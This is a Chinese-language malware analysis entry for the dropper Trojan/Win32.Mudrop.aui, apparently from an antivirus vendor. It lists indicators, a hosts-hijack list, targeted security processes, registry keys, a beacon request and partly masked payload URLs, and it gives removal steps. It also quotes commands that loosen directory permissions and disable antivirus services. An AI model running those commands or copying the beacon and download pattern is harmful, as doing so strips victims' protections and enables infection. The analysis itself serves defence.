Trojan/Win32.Mudrop.aui

王朝百科·作者佚名 2010-07-15

宽屏版字体: 小|中|大|超大

病毒标签：病毒名称： Trojan/Win32.Mudrop.aui[Dropper]

病毒类型：木马

文件 MD5： 6CF94B87CBEABFA0CEC421F3E4827823

公开范围：完全公开

危害等级： 4

文件长度： 13,840 字节

感染系统： Windows98以上版本

开发工具： Microsoft Visual C++ 6.0

加壳类型： NsPacK V3.7

病毒描述：该恶意代码文件为木马类，病毒运行后动获取大量API函数，创建病毒互斥量"907ERT"防止病毒多次运行产生冲突，遍历%System32%目录下是否存在"explorer.exe"文件，调用CMD命令将%Windir%、%Temp%目录给予当前用户完全控制权限，停止ekrn、AVP安全软件服务、结束大量安全软件进程，衍生病毒DLL文件到%System32%目录下，使用rundll32.exe启动病毒DLL文件，衍生病毒DLL到%Windir%目录下，动态获取病毒DLL的"FF"模块，进入该模块内后病毒判断自身进程是否在"explorer.exe"进程中，如是则创建hosts文件、劫持大量域名地址，调用API函数，查找含有windows 文件保护、找到恢复文件对话框的窗口，找到后将其窗口隐藏，在每个磁盘根目录下创建autorun.inf文件，添加注册表病毒服务创建病毒驱动文件，通过ipconfig all命令获取本机MAC地址连接网络发送安装统一信息，并下载大量病毒文件到本地。

行为分析-本地行为：1、病毒运行后动获取大量API函数，创建病毒互斥量"907ERT"防止病毒多次运行产生冲突，遍历%System32%目录下是否存在"explorer.exe"文件，调用CMD命令："cmd /c cacls C:WINDOWS /e /p everyone:f"将%Windir%、%Temp%目录给予当前用户完全控制权限，使用："cmd /c sc config ekrn start= disabled"、cmd /c sc config avp start= disabled停止ekrn、AVP安全软件服务。

2、动态获取病毒DLL的"FF"模块，进入该模块内后病毒判断自身进程是否在"explorer.exe"进程中，如是则创建hosts文件、劫持大量域名地址，调用API函数，查找含有windows 文件保护、找到恢复文件对话框的窗口，找到后将其窗口隐藏，在每个磁盘根目录下创建autorun.inf文件，通过ipconfig all命令获取本机MAC地址连接网络发送安装统一信息，被劫持的hosts域名列表：

127.0.0.1 v.onondown.com.cn

127.0.0.2 ymsdasdw1.cn

127.0.0.3 h96b.info

127.0.0.0 fuck.zttwp.cn

127.0.0.0 www.hackerbf.cn

127.0.0.0 geekbyfeng.cn

127.0.0.0 121.14.101.68

127.0.0.0 ppp.etimes888.com

127.0.0.0 www.bypk.com

127.0.0.0 CSC3-2004-crl.verisign.com

127.0.0.1 va9sdhun23.cn

127.0.0.0 udp.hjob123.com

127.0.0.2 bnasnd83nd.cn

127.0.0.0 www.gamehacker.com.cn

127.0.0.0 gamehacker.com.cn

127.0.0.3 adlaji.cn

127.0.0.1 858656.com

127.1.1.1 bnasnd83nd.cn

127.0.0.1 my123.com

127.0.0.0 user1.12-27.net

127.0.0.1 8749.com

127.0.0.0 fengent.cn

127.0.0.1 4199.com

127.0.0.1 user1.16-22.net

127.0.0.1 7379.com

127.0.0.1 2be37c5f.3f6e2cc5f0b.com

127.0.0.1 7255.com

127.0.0.1 user1.23-12.net

127.0.0.1 3448.com

127.0.0.1 www.guccia.net

127.0.0.1 7939.com

127.0.0.1 a.o1o1o1.nEt

127.0.0.1 8009.com

127.0.0.1 user1.12-73.cn

127.0.0.1 piaoxue.com

127.0.0.1 3n8nlasd.cn

127.0.0.1 kzdh.com

127.0.0.0 www.sony888.cn

127.0.0.1 about.blank.la

127.0.0.0 user1.asp-33.cn

127.0.0.1 6781.com

127.0.0.0 www.netkwek.cn

127.0.0.1 7322.com

127.0.0.0 ymsdkad6.cn

127.0.0.1 localhost

127.0.0.0 www.lkwueir.cn

127.0.0.1 06.jacai.com

127.0.1.1 user1.23-17.net

127.0.0.1 1.jopenkk.com

127.0.0.0 upa.luzhiai.net

127.0.0.1 1.jopenqc.com

127.0.0.0 www.guccia.net

127.0.0.1 1.joppnqq.com

127.0.0.0 4m9mnlmi.cn

127.0.0.1 1.xqhgm.com

127.0.0.0 mm119mkssd.cn

127.0.0.1 100.332233.com

127.0.0.0 61.128.171.115:8080

127.0.0.1 121.11.90.79

127.0.0.0 www.1119111.com

127.0.0.1 121565.net

127.0.0.0 win.nihao69.cn

127.0.0.1 125.90.88.38

127.0.0.1 16888.6to23.com

127.0.0.1 2.joppnqq.com

127.0.0.0 puc.lianxiac.net

127.0.0.1 204.177.92.68

127.0.0.0 pud.lianxiac.net

127.0.0.1 210.74.145.236

127.0.0.0 210.76.0.133

127.0.0.1 219.129.239.220

127.0.0.0 61.166.32.2

127.0.0.1 219.153.40.221

127.0.0.0 218.92.186.27

127.0.0.1 219.153.46.27

127.0.0.0 www.fsfsfag.cn

127.0.0.1 219.153.52.123

127.0.0.0 ovo.ovovov.cn

127.0.0.1 221.195.42.71

127.0.0.0 dw.com.com

127.0.0.1 222.73.218.115

127.0.0.1 203.110.168.233:80

127.0.0.1 3.joppnqq.com

127.0.0.1 203.110.168.221:80

127.0.0.1 363xx.com

127.0.0.1 www1.ip10086.com.cm

127.0.0.1 4199.com

127.0.0.1 blog.ip10086.com.cn

127.0.0.1 43242.com

127.0.0.1 www.ccji68.cn

127.0.0.1 5.xqhgm.com

127.0.0.0 t.myblank.cn

127.0.0.1 520.mm5208.com

127.0.0.0 x.myblank.cn

127.0.0.1 59.34.131.54

127.0.0.1 210.51.45.5

127.0.0.1 59.34.198.228

127.0.0.1 www.ew1q.cn

127.0.0.1 59.34.198.88

127.0.0.1 59.34.198.97

127.0.0.1 60.190.114.101

127.0.0.1 60.190.218.34

127.0.0.0 qq-xing.com.cn

127.0.0.1 60.191.124.252

127.0.0.1 61.145.117.212

127.0.0.1 61.157.109.222

127.0.0.1 75.126.3.216

127.0.0.1 75.126.3.217

127.0.0.1 75.126.3.218

127.0.0.0 59.125.231.177:17777

127.0.0.1 75.126.3.220

127.0.0.1 75.126.3.221

127.0.0.1 75.126.3.222

127.0.0.1 772630.com

127.0.0.1 832823.cn

127.0.0.1 8749.com

127.0.0.1 888.jopenqc.com

127.0.0.1 89382.cn

127.0.0.1 8v8.biz

127.0.0.1 97725.com

127.0.0.1 9gg.biz

127.0.0.1 www.9000music.com

127.0.0.1 test.591jx.com

127.0.0.1 a.topxxxx.cn

127.0.0.1 picon.chinaren.com

127.0.0.1 www.5566.net

127.0.0.1 p.qqkx.com

127.0.0.1 news.netandtv.com

127.0.0.1 z.neter888.cn

127.0.0.1 b.myblank.cn

127.0.0.1 wvw.wokutu.com

127.0.0.1 unionch.qyule.com

127.0.0.1 www.qyule.com

127.0.0.1 it.itjc.cn

127.0.0.1 www.linkwww.com

127.0.0.1 vod.kaicn.com

127.0.0.1 www.tx8688.com

127.0.0.1 b.neter888.cn

127.0.0.1 promote.huanqiu.com

127.0.0.1 www.huanqiu.com

127.0.0.1 www.haokanla.com

127.0.0.1 play.unionsky.cn

127.0.0.1 www.52v.com

127.0.0.1 www.gghka.cn

127.0.0.1 icon.ajiang.net

127.0.0.1 new.ete.cn

127.0.0.1 www.stiae.cn

127.0.0.1 o.neter888.cn

127.0.0.1 comm.jinti.com

127.0.0.1 www.google-analytics.com

127.0.0.1 hz.mmstat.com

127.0.0.1 www.game175.cn

127.0.0.1 x.neter888.cn

127.0.0.1 z.neter888.cn

127.0.0.1 p.etimes888.com

127.0.0.1 hx.etimes888.com

127.0.0.1 abc.qqkx.com

127.0.0.1 dm.popdm.cn

127.0.0.1 www.yl9999.com

127.0.0.1 www.dajiadoushe.cn

127.0.0.1 v.onondown.com.cn

127.0.0.1 www.interoo.net

127.0.0.1 bally1.bally-bally.net

127.0.0.1 www.bao5605509.cn

127.0.0.1 www.rty456.cn

127.0.0.1 www.werqwer.cn

127.0.0.1 1.360-1.cn

127.0.0.1 user1.23-16.net

127.0.0.1 www.guccia.net

127.0.0.1 www.interoo.net

127.0.0.1 upa.netsool.net

127.0.0.1 js.users.51.la

127.0.0.1 vip2.51.la

127.0.0.1 web.51.la

127.0.0.1 qq.gong2008.com

127.0.0.1 2008tl.copyip.com

127.0.0.1 tla.laozihuolaile.cn

127.0.0.1 www.tx6868.cn

127.0.0.1 p001.tiloaiai.com

127.0.0.1 s1.tl8tl.com

127.0.0.1 s1.gong2008.com

127.0.0.1 4b3ce56f9g.3f6e2cc5f0b.com

127.0.0.1 2be37c5f.3f6e2cc5f0b.com

3、监视以下进程发现后将其进程强行关闭：

rsmain.exe、scanfrm.exe、rsnetsvr.exe、rssafety.exe、avp.exe、safeboxtray.exe、360safe.exe、360safebox.exe、360tray.exe、antiarp.exe、ekrn.exe、egui.exe、ravmon.exe、ravmond.exe、ravtask.exe、ccenter.exe、ravstub.exe、ravstub.exe、rstray.exe、rstray.exe、rav.exe、rav.exe、rsaupd.exe、rsaupd.exe、agentsvr.exe、agentsvr.exe、qqdoctor.exe、drrtp.exe、mcproxy.exe、mcnasvc.exe、mcshield.exe、mpfsrv.exe、pccguide.exe、zonealarm.exe、zonealarm.exe、wink.exe、windows优化大师.exe、wfindv32.exe、webtrap.exe、webscanx.exe、webscan.exe、vsstat.exe、vshwin32.exe、vshwin32.exe、vsecomr.exe、vpc32.exe、vir.exe、vettray.exe、vet95.exe、vavrunr.exe、ulibcfg.exe、tsc.exe、tmupdito.exe、tmproxy.exe、tmoagent.exe、tmntsrv.exe、tds2-ntexe、tds298.exe、tca.exe、tbscan.exe、sweep95.exe、spy.exe、sphinx.exe、smtpsvc.exe、smc.exe、sirc32.exe、serv95.exe、secu.exe、scrscan.exe、scon.exe、scanpm.exe、scan32.exe、scan.exe、safeweb.exe、scam32.exe、rfw.exe、rfwmain.exe、rfwsrv.exe、rfwstub.exe、rfwproxy.exe、rescue32.exe、rav7win.exe、rav7.exe、ras.exe、pview95.exe、prot.exe、program.exe、ppppwallrun.exe、pop3trap.exe、persfw.exe、pcfwallicon.exe、pccwin98.exe、pccmain.exe、pcciomon.exe、pccclient.exe、navwnt.exe、navw32.exe、navw.exe、navsched.exe、navrunr.exe、navnt.exe、navlu32.exe、navapw32.exe、navapsvc.exe、n32acan.exe、moolive.exe、moniker.exe、mon.exe、mcafee.exe、lucomserver.exe、luall.exe、kwatch.exe、kvprescan.exe、kvmonxp.exe、krf.exe、kppmain.exe、kpfwsvc.exe、kpfw32.exe、kpfw32.exe、kissvc.exe、kavstart.exe、kav32.exe、kasmain.exe、kabackreport.exe、jed.exe、cfinet32.exe、cfinet.exe、cfind.exe、cfiaudit.exe、avwin95.exe、avsynmgr.exe、avsched32.exe、avpupd.exe、avkserv.exe、autodown.exe、antivir.exe、anti-trojan.exe、dvp95exe、dv95o.exe、dv95.exe、kaccore.exe、kmailmon.exe、nod32krn.exe、efcv.exe、avp.exe

4、病毒运行后衍生以下文件到系统目录下

%System32%driversetchosts

%System32%driversOLD3.tmp

%System32%driverspcidump.sys

%System32%driversacpiec.sys

%System32%dllcacheacpiec.sys

%System32%func.dll

%Windir%LastGoodsystem32driversacpiec.sys

%Windir%phpi.dll

5、添加病毒注册表服务启动项

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicespcidumpDisplayName

值: 字符串: "pcidump"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicespcidumpImagePath

值: 字符串: "System32DRIVERSpcidump.sys."

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicespcidumpStart

值: DWORD: 3 (0x3)

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicespcidumpType

值: DWORD: 1 (0x1)

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesUPDATEDATADisplayName

值: 字符串: "UPDATEDATA"

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesUPDATEDATAImagePath

值: 字符串: "??C:WINDOWSsystem32driversacpiec.sys."

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesUPDATEDATAStart

值: DWORD: 3 (0x3)

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesUPDATEDATAType

值: DWORD: 1 (0x1)

行为分析-网络行为：GET /360/aa1dfh.txt?mac=00-0C-29-8C-9D-B6&ver=v1-300&key=146&os=windows HTTP/1.1

User-Agent: INet

Host: babi2009.com

Cache-Control: no-cache

描述：向该域名提交安装统计信息，并按以下列表下载大量恶意病毒文件

HTTP/1.1 200 OK

Content-Length: 1320

Content-Type: text/plain

Last-Modified: Thu, 25 Jun 2009 06:48:33 GMT

Accept-Ranges: bytes

ETag: "cee827f560f5c91:2c0"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Tue, 30 Jun 2009 07:12:10 GMT

2:http://havvvha***.com/xiao/aa1.exe

2:http://havvvha***.com/xiao/aa2.exe

2:http://havvvha***.com/xiao/aa3.exe

2:http://havvvha***.com/xiao/aa4.exe

1:http://havvvha***.com/xiao/aa5.exe

2:http://havvvha***.com/xiao/aa6.exe

2:http://havvvha***.com/xiao/aa7.exe

2:http://havvvha***.com/xiao/aa8.exe

2:http://havvvha***.com/xiao/aa9.exe

2:http://havvvha***.com/xiao/aa10.exe

2:http://havvvha***.com/xiao/aa11.exe

2:http://havvvha***.com/xiao/aa12.exe

2:http://havvvha***.com/xiao/aa13.exe

2:http://havvvha***.com/xiao/aa14.exe

2:http://havvvha***.com/xiao/aa15.exe

2:http://havvvha***.com/xiao/aa16.exe

2:http://havvvha***.com/xiao/aa17.exe

2:http://havvvha***.com/xiao/aa18.exe

2:http://havvvha***.com/xiao/aa19.exe

2:http://havvvha***.com/xiao/aa20.exe

2:http://havvvha***.com/xiao/aa21.exe

2:http://havvvha***.com/xiao/aa22.exe

2:http://havvvha***.com/xiao/aa23.exe

2:http://havvvha***.com/xiao/aa24.exe

2:http://havvvha***.com/xiao/aa25.exe

2:http://havvvha***.com/xiao/aa26.exe

2:http://havvvha***.com/xiao/aa27.exe

2:http://havvvha***.com/xiao/aa28.exe

2:http://havvvha***.com/xiao/aa29.exe

2:http://havvvha***.com/xiao/aa30.exe

2:http://havvvha***.com/xiao/aa31.exe

2:http://havvvha***.com/xiao/aa32.exe

2:http://havvvha***.com/xiao/aa33.exe

2:http://havvvha***.com/xiao/aa34.exe

2:http://havvvha***.com/xiao/aa35.exe

2:http://havvvha***.com/xiao/aa36.exe

2:http://havvvha***.com/xiao/1.exe

注：%System32%是一个可变路径。病毒通过查询操作系统来决定当前System文件夹的位置。

%Windir% WINDODWS所在目录

%DriveLetter%逻辑驱动器根目录

%ProgramFiles%系统程序默认安装目录

%HomeDrive% 当前启动的系统的所在分区

%Documents and Settings% 当前用户文档根目录

%Temp% Documents and Settings当前用户Local SettingsTemp

%System32% 系统的 System32文件夹

Windows2000/NT中默认的安装路径是C:WinntSystem32

windows95/98/me中默认的安装路径是C:WindowsSystem

windowsXP中默认的安装路径是C:WindowsSystem32

清除方案：1、使用安天防线可彻底清除此病毒(推荐)，请点击下载(http://www.antiyfx.com/download.htm)。

2、手工清除请按照行为分析删除对应文件，恢复相关系统设置。

推荐使用ATool管理工具，请点击下载(http://www.antiy.com/cn/download/atool.htm)。

（1）使用ATOOL“进程管理”关闭病毒相关进程，结束rundll32.exe

（2）删除病毒连接网络下载的大量病毒衍生的文件（注：病毒下载的列表内容会随时更换，所以衍生的文件也有可能变化）

%System32%driversetchosts

%System32%driversOLD3.tmp

%System32%driverspcidump.sys

%System32%driversacpiec.sys

%System32%dllcacheacpiec.sys

%System32%func.dll

%Windir%LastGoodsystem32driversacpiec.sys

%Windir%phpi.dll

（3）删除病毒添加的注册表服务

HKEY_LOCAL_MACHINESYSTEMControlSet001Servicespcidump

删除Services 键值下的pcidump主键值

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesUPDATEDATA

删除UPDATEDATA 键值下的pcidump主键值